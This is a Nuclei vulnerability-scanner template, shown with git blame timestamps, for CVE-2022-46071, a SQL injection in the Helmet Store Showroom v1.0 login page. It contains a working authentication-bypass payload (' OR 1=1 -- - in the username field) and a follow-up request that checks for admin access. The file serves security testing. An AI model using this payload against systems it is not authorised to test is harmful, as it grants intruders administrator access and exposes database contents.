nuclei-templates/http/cves/2022/CVE-2022-46071.yaml

49 lines
1.8 KiB
YAML
Raw Permalink Normal View History

2023-06-30 07:14:02 +00:00
id: CVE-2022-46071
info:
2023-06-30 12:21:12 +00:00
name: Helmet Store Showroom v1.0 - SQL Injection
2023-06-30 07:14:02 +00:00
author: Harsh
severity: critical
description: |
There is SQL Injection vulnerability at Helmet Store Showroom v1.0 Login Page. This vulnerability can be exploited to bypass admin access.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.
2023-09-06 11:59:08 +00:00
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
2023-06-30 07:14:02 +00:00
reference:
- https://yuyudhn.github.io/CVE-2022-46071/
- https://nvd.nist.gov/vuln/detail/CVE-2022-46071
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-46071
cwe-id: CWE-89
epss-score: 0.01454
epss-percentile: 0.86654
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:helmet_store_showroom_site_project:helmet_store_showroom_site:1.0:*:*:*:*:*:*:*
2023-06-30 07:14:02 +00:00
metadata:
verified: true
2023-09-06 11:59:08 +00:00
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: helmet_store_showroom_site_project
product: helmet_store_showroom_site
2023-12-05 09:50:33 +00:00
tags: cve,cve2022,sqli,admin-bypass,helmet,helmet_store_showroom_site_project
2023-06-30 12:21:12 +00:00
2023-06-30 07:14:02 +00:00
http:
- raw:
- |
2023-07-10 12:29:22 +00:00
POST /classes/Login.php?f=login HTTP/1.1
2023-06-30 07:14:02 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username='+OR+1%3D1+--+-&password=1234
- |
2023-07-10 12:29:22 +00:00
GET /admin/ HTTP/1.1
2023-06-30 07:14:02 +00:00
Host: {{Hostname}}
2023-06-30 12:21:12 +00:00
2023-06-30 07:14:02 +00:00
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
2023-07-10 12:29:22 +00:00
- 'contains(body_2, "Helmet Store") && contains(body_2, "Adminstrator Admin")'
2023-06-30 07:14:02 +00:00
condition: and
# digest: 490a004630440220411e491dd1303ae052dafb68d14917823da18347f38f61fe8f9ed7fbc8dedcd202207e676d9affa4e8fcf42f6b5715534ec57ae860c7394627348a49dca2b82dc0a7:922c64590222798bb761d5b6d8e72950